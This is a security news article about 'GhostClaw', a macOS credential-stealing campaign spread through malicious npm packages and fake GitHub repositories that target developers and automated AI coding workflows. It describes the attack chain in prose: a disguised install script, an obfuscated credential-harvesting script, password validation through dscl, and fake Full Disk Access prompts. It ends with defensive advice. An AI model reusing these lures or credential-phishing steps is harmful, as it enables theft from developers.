GhostClaw - New AI Malware Targets macOS for Credential Theft

What Happened

A new malware campaign named GhostClaw has been discovered, specifically targeting macOS users. This campaign employs fake GitHub repositories and AI-assisted development workflows to lure developers. Initially documented by JFrog Security Research in early March 2026, GhostClaw uses social engineering tactics disguised as legitimate developer tools. The malware is distributed through malicious npm packages, aiming at developers who frequently install tools from public package registries.

GhostClaw's reach has expanded beyond npm, infiltrating GitHub-hosted repositories that impersonate popular developer utilities. One such repository, TradingView-Claw, gained credibility with 386 GitHub stars, misleading users into trusting its authenticity. As researchers from Jamf Threat Labs investigated, they found at least eight new samples linked to GhostClaw, confirming its evolving tactics and infrastructure.

Who's Being Targeted

GhostClaw primarily targets developers who rely on public repositories for tools and libraries. By embedding malicious code within trusted ecosystems, attackers can reach a broader audience. The campaign's dual infection strategy is particularly concerning. It not only targets human users but also exploits automated development tools, allowing the malware to spread without direct human interaction.

The implications of this campaign extend beyond individual developers. By compromising trusted platforms like GitHub, attackers can potentially infect numerous systems through a single malicious payload. This trend highlights a growing concern in the software supply chain, where attackers leverage legitimate tools to execute their malicious plans.

Signs of Infection

The GhostClaw infection process follows a multi-stage execution chain designed for credential theft. It begins with a bootstrapper script called install.sh, which masquerades as a standard setup tool. This script checks the macOS version and installs Node.js without requiring elevated privileges. Notably, it uses curl with the --insecure flag, a behavior rarely seen in legitimate installers.

Once the initial setup is complete, the malware executes an obfuscated JavaScript file named setup.js to collect user credentials. This script cleverly mimics legitimate installation processes, displaying fake progress indicators to avoid detection. Users may unwittingly provide their passwords, which the malware validates using the native macOS binary dscl. If the malware lacks Full Disk Access, it prompts users with fake security dialogs to grant necessary permissions.

How to Protect Yourself

To safeguard against GhostClaw and similar threats, users and developers must exercise caution when executing installation commands from GitHub or online guides. Always verify the source and behavior of any code before execution. Security teams managing macOS environments should monitor for unusual dscl usage and processes seeking Full Disk Access.

Additionally, employing security tools that can detect obfuscated scripts and monitor network traffic to command-and-control servers is essential. Educating developers about the risks associated with using unverified repositories can help mitigate the impact of such malware campaigns.